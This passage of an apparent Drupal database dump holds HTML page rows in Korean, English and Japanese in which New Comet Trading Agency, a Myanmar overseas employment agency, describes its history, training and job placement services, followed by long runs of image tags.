data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 300, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.<br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.<br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.<br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.&nbsp;<br>또한, 두바이, 말레이시아, 싱가포르, 태국, 일본, 그리고 한국 등과 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 갖을 수 있도록 &nbsp;서비스를 제공하고 있습니다.<br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.<br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.<br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\" data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\" data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\" data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\" data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_4.jpg\" data-align=\"center\" data-entity-uuid=\"0a89d13f-c12c-43f7-a18f-7bcd1d908d75\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_4.jpg\" data-align=\"center\" data-entity-uuid=\"136af80f-38b1-4d25-9ce5-02123b7285ad\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_4.jpg\" data-align=\"center\" data-entity-uuid=\"637ad23f-775f-409b-98d9-aa8d53f8de5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" data-entity-uuid=\"91065924-7e1b-40a5-a985-ab3a738841c7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-17_1.jpg\" data-align=\"center\" data-entity-uuid=\"cd43fa36-c108-48c2-b25d-dc1862c70dea\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_1.jpg\" data-align=\"center\" data-entity-uuid=\"525a5838-a4d8-457f-97be-230841a5f654\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-19_1.jpg\" data-align=\"center\" data-entity-uuid=\"4b653764-4d92-4445-8e27-7614f6ef64a5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-20_1.jpg\" data-align=\"center\" data-entity-uuid=\"e3ff3d3c-7c9e-462a-91f1-6c6a9aa06067\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21_1.jpg\" data-align=\"center\" data-entity-uuid=\"d8dbbc11-8a02-4d92-beee-82d3aba0c040\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_1.jpg\" data-align=\"center\" data-entity-uuid=\"48756932-2a18-4eed-9166-8ae3d494765e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_1.jpg\" data-align=\"center\" data-entity-uuid=\"f184253a-5469-4443-ad8a-350db9f4c92d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_1.jpg\" data-align=\"center\" data-entity-uuid=\"a06d2513-b3b1-4975-8202-104c9b9ddf54\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-25_1.jpg\" data-align=\"center\" data-entity-uuid=\"3b495714-4bd4-411e-ae46-cc161a43ecd1\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_1.jpg\" data-align=\"center\" data-entity-uuid=\"d495b5fa-e307-41df-b301-614c7b02a674\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_1.jpg\" data-align=\"center\" data-entity-uuid=\"ad5dc94c-17ae-411f-99e9-6d1b74a22e99\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_1.jpg\" data-align=\"center\" data-entity-uuid=\"c3de86e8-0aee-413b-b2d5-5ba6506e8954\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_1.jpg\" data-align=\"center\" data-entity-uuid=\"7535e5c5-67cc-42fe-a4b1-8360b4e324d5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_4.jpg\" data-align=\"center\" data-entity-uuid=\"be405527-a576-421a-af55-70724f3aed8b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_1.jpg\" data-align=\"center\" data-entity-uuid=\"f37e9936-ed46-428b-abbb-f585384d411f\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 304, 'en', 0, '<p>We, “NEW COMET TRADING” company, was established in 2004 and started operating with company registration number (295/2004-2005).<br>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.<br>“NEW COMET TRADING” is part of the “NEW COMET TRADING GROUP”. Moreover, the largest entity within it, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan. We have been diligent in paying our taxes and have grown to employ 100 employees.<br>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.<br>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.<br>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea, and etc.<br>We at NEW COMET TRADING AGENCY Co., Ltd., are responsible for assisting to-be-employees from the young generation of Myanmar in learning about Japan\'s developed advanced technologies and cultures, while making sure they are able to express their personal abilities and traits.<br>In order to for our to-be-employees to pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.<br>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\" data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\" data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\" data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\"><img data-entity-uuid=\"fdb82619-ca1a-4347-ad15-71c283cda59b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\" data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\"><img data-entity-uuid=\"43d414b0-75e3-40e5-b535-eb8bc91ae947\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"a74c9c3b-1631-4c0f-8750-7543e24d67be\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"0611b3a9-c229-444d-906e-d6401ae82458\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2de69b23-8c4f-473c-b679-a074892f3b85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a605b5f-2bff-4071-addf-6b65cfd37a53\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_5.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img data-entity-uuid=\"08a12c29-83b6-46ca-b835-84f7f6270b3d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img data-entity-uuid=\"1ffe4d12-0ef2-42f1-a14c-683cff75bd4c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 304, 'ja', 0, '<p>当社は2004年に設立され、登録ID(295/2004-2005)を取得し、以来サービスの提供を行ってきました。そして、2023年に当社ニューコメットトレンディング海外エージェンシーを設立し、運営を開始しました。<br>当社はニュー コメット トレーディング グループの一部である。その中で最大規模のゼーヤーニューコメット自動車売買&amp;サービス株式会社は自動車の輸入許可を得て、建設現場用のトラックや、交通機関として使われるバスや様々な機械を日本から直接輸入し、販売する事業を25年間続けてきました。納税もきちんと行い、100人の従業員を雇用するまでになりました。<br>また、グループの一部であるニューコメット建築株式会社、ゼッヤシェピーティー建築株式会社、アウンネーウィン建築株式会社も政府から許可を多く受け取り、合わせて200人以上の人材紹介に成功しております。<br>現在、ニューコメットトレンディング海外エージェンシーでは、ミャンマー全国から来た民族を問わずに韓国の造船所で働きたい人たちに対して、シンマライ湾岸で経験豊富な指導者たちの下で訓練を受ける機会を提供し、仕事の紹介を行っています。<br>さらに、ドバイ、マレーシア、シンガポール、タイ、日本、韓国など、への就職もサポートしています。<br>ミャンマーの若者たちが自分らしさを保ちながら、自分に合った仕事を見つけ、日本の技術を学ぶことができるように支援を続けています。日本語能力試験(JLPT, JFT, NAT-TEST, TOP-J)に合格した学生に対しては、ワークビザや研修ビザを取得するための支援を提供しています。<br>我々ニューコメットトレーディング海外エージェンシーは、経験豊富で能力の高い研修生を育成し、海外の仕事チャンスを提供することに尽力して参ります。</p><img src=\"/sites/default/files/inline-images/1-NC_0.jpg\" data-align=\"center\" data-entity-uuid=\"7147154e-6c57-4d0c-99dc-5e6a1ad56cc8\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1_3.jpg\" data-align=\"center\" data-entity-uuid=\"20d75075-fb13-4332-9836-0cdbf49b8dfd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_0.jpg\" data-align=\"center\" data-entity-uuid=\"1c875d61-a0c2-42a5-b28e-ff5255dd8ad3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_4.jpg\" data-align=\"center\" data-entity-uuid=\"e7288834-ff3b-480c-9234-fc6593057fbd\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_3.jpg\" data-align=\"center\" data-entity-uuid=\"03602aa7-45bb-4473-9c3d-d87c28205132\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_3.jpg\" data-align=\"center\" data-entity-uuid=\"189e39d2-6713-4114-942b-44bd26eec52f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_0.jpg\" data-align=\"center\" data-entity-uuid=\"b24eb73f-1d94-4450-81a5-afb6790a13f7\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-7_3.jpg\" data-align=\"center\" data-entity-uuid=\"df47ee75-79b9-4616-81c0-0e34a78c90ef\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_0.jpg\" data-align=\"center\" data-entity-uuid=\"873929b2-4641-4686-834e-aa5ef5948b3a\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-9_0.jpg\" data-align=\"center\" data-entity-uuid=\"aa07abd4-d198-4e2c-af81-6f1eae19da17\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-10_3.jpg\" data-align=\"center\" data-entity-uuid=\"663f2f7b-fe72-4e59-9d3b-c336ed24793f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_3.jpg\" data-align=\"center\" data-entity-uuid=\"2b72d0df-bb39-4ae6-b065-54b7507416ad\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_3.jpg\" data-align=\"center\" data-entity-uuid=\"7a91e859-2d7e-464a-b848-a660987c0ce3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_0.jpg\" data-align=\"center\" data-entity-uuid=\"b1eadb3f-c0b7-445e-aee6-f7523ba1158d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-14_0.jpg\" data-align=\"center\" data-entity-uuid=\"676ffad7-c9a6-4d2a-9969-98e69477570c\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15_0.jpg\" data-align=\"center\" data-entity-uuid=\"1131bddf-f0bb-4121-8c20-574a69c2e43d\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-16_0.jpg\" data-align=\"center\" data-entity-uuid=\"b0805653-8b57-493a-b7da-98b99b135795\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e057327-e93f-41cc-a966-3bbfdb7046b0\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-18_0.jpg\" data-align=\"center\" data-entity-uuid=\"e2e7295f-d240-4c94-90f6-b52bc0c587bc\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-19_0.jpg\" data-align=\"center\" data-entity-uuid=\"1a08f51b-fce7-42d3-ae81-1ad523dfd3e1\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-20_0.jpg\" data-align=\"center\" data-entity-uuid=\"df97660b-54a9-403b-9796-90dcfbb580bd\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-21_0.jpg\" data-align=\"center\" data-entity-uuid=\"456bf806-4df8-483a-9bb9-78b3e285cd70\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22_0.jpg\" data-align=\"center\" data-entity-uuid=\"81098b50-a382-45b2-b96a-44bb91384739\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23_0.jpg\" data-align=\"center\" data-entity-uuid=\"6c66b62a-1389-4f5c-b496-bd6f105c4259\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-24_0.jpg\" data-align=\"center\" data-entity-uuid=\"f8bf2dde-b25f-46bb-bc27-d95b894955e3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-25_0.jpg\" data-align=\"center\" data-entity-uuid=\"547038de-6845-4549-9311-0f02a922f630\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26_0.jpg\" data-align=\"center\" data-entity-uuid=\"9c4a4a7d-81b0-4e33-b434-9e141438631c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-27_0.jpg\" data-align=\"center\" data-entity-uuid=\"ab06b9a1-42d7-4f07-9be5-8a825c7fca60\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-28_0.jpg\" data-align=\"center\" data-entity-uuid=\"6e769851-41be-4e61-8110-5290daf2cda3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29_0.jpg\" data-align=\"center\" data-entity-uuid=\"ca9cad00-b0a2-4251-9585-5c48526f9748\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_3.jpg\" data-align=\"center\" data-entity-uuid=\"4b011db5-14e8-4a56-a6da-e6fe90c2e0f3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41_0.jpg\" data-align=\"center\" data-entity-uuid=\"5f5513ae-611d-4f95-aaba-1227dc176b2c\" data-entity-type=\"file\">', '', 'full_html'),
('page', 0, 23, 304, 'ko', 0, '<p>저희 ``New Comet Trading\'\' 회사는 2004년에 설립되어 사업자등록번호(295/2004-2005)로 영업을 시작하였습니다.<br>뉴코멧 해외직업소개회사는 2023년 외국인고용업 면허를 취득하여 서비스 활동을 시작하였습니다.<br>저희 뉴코멧 해외직업소개회사 \"New Comet Overseas Employment Agency\"는자매 회사인 &nbsp;제야뉴코멧 자동차 판매 및 서비스 회사, 뉴코멧회사등 기업들과 협력하여 경제통상자원부에서 &nbsp;차량 수입허가를 신청했고 각종 상용트럭, 관광 산업 및 운송에 사용되는 다양한 유형의 버스 및 기계를 일본에서 직접 구매 판매하는 사업을 25년 이상 &nbsp;종사해 왔고 나라를 위한 정한 세금들을 냈습니다. 게다가100 명 이상의 직원에게 고용 기회를 제공했습니다.<br>또한 쌍둥이 회사인 뉴코멧건설 회사, 제야슈웨삐띡 건설 회사, 아웅네원 회사들은 정부 부처로부터 입찰 (tender)을 받고 건설 작업을 하는 동안 200명 이상의 직원에게 고용 기회를 제공했습니다.<br>저희 \"뉴코멧 해외 직업 소개회사\"는 한국 조선소로 취업을 희망하는 미얀마 각지에서 온 소수민족 형제들을 교통통신부 산하의 씬마락 (Sinmalike) 조선소에서 유능한 트레이너들와 함께 실력있는 용접공이 되도록 수업을 제공하고 있으며 관련 기업체로 취업할 수 있게 도와주고 있습니다.&nbsp;<br>또한, 두바이, 말레이시아, 싱가포르, 태국, 일본, 그리고 한국 등과 같은 국가에서 일하기를 원하는 청년들에게 취업 기회를 갖을 수 있도록 &nbsp;서비스를 제공하고 있습니다.<br>New Comet Trading Agency Co., Ltd.는 미얀마의 젊은 치누들이 일본의 개발한 첨단 기술을 배우고 꿈을 실현할 수 있도록 필요한 교육을 제공하고 돕고 있습니다.<br>일본으로 취업비자, 연수비자로 가기 위해 필요한 자격시험(JLPT, JFT, NAT-TEST, TOP-J)에 합격할 수 있도록 어학당도 개설 및 교육을 지원하고 있습니다.<br>저희는”뉴코멧 해외직업소개회사” 는 미얀마에서 우수한 기능인력을 배출하여 해외로 파견하는 서비스를 제공하기 위해 끊임없이 노력하고 있습니다.</p><img src=\"/sites/default/files/inline-images/1-NC_1.jpg\" data-align=\"center\" data-entity-uuid=\"7375e186-cf58-4d75-b92f-9eab22b78118\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-1_4.jpg\" data-align=\"center\" data-entity-uuid=\"95208b24-3912-47cb-b94e-77132a3ec814\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-2_1.jpg\" data-align=\"center\" data-entity-uuid=\"4dc4f426-e69c-44ec-8caf-4b1931fdf8b8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_5.jpg\" data-align=\"center\" data-entity-uuid=\"e9bcdc81-0d00-49fb-9571-b8bc777f5fdb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_4.jpg\" data-align=\"center\" data-entity-uuid=\"faa757f4-ca65-4ec0-9775-5e338a7528c8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_4.jpg\" data-align=\"center\" data-entity-uuid=\"b3288e51-9e4d-4c06-9d79-c0c9d7e39b05\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-6_1.jpg\" data-align=\"center\" data-entity-uuid=\"55284a88-e85b-4812-9ae7-807f898d55f7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-7_4.jpg\" data-align=\"center\" data-entity-uuid=\"7d1d0387-7914-47da-aa48-a5999065485b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-8_1.jpg\" data-align=\"center\" data-entity-uuid=\"0dfa63f3-2933-4e8b-842c-fb4562d7176d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-9_1.jpg\" data-align=\"center\" data-entity-uuid=\"16e03ce5-055f-4f8f-8be5-1f11619e8445\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-10_4.jpg\" data-align=\"center\" data-entity-uuid=\"0a89d13f-c12c-43f7-a18f-7bcd1d908d75\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-11_4.jpg\" data-align=\"center\" data-entity-uuid=\"136af80f-38b1-4d25-9ce5-02123b7285ad\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-12_4.jpg\" data-align=\"center\" data-entity-uuid=\"637ad23f-775f-409b-98d9-aa8d53f8de5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-13_1.jpg\" data-align=\"center\" data-entity-uuid=\"cbc0b282-1b93-4f31-a52e-e00ed85f6499\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14_1.jpg\" data-align=\"center\" data-entity-uuid=\"8bba0525-3d17-4730-ac6a-43174e89662b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-15_1.jpg\" data-align=\"center\" data-entity-uuid=\"5f6a15dd-8d0a-4102-b60c-36467fd6e2a0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16_1.jpg\" data-align=\"center\" 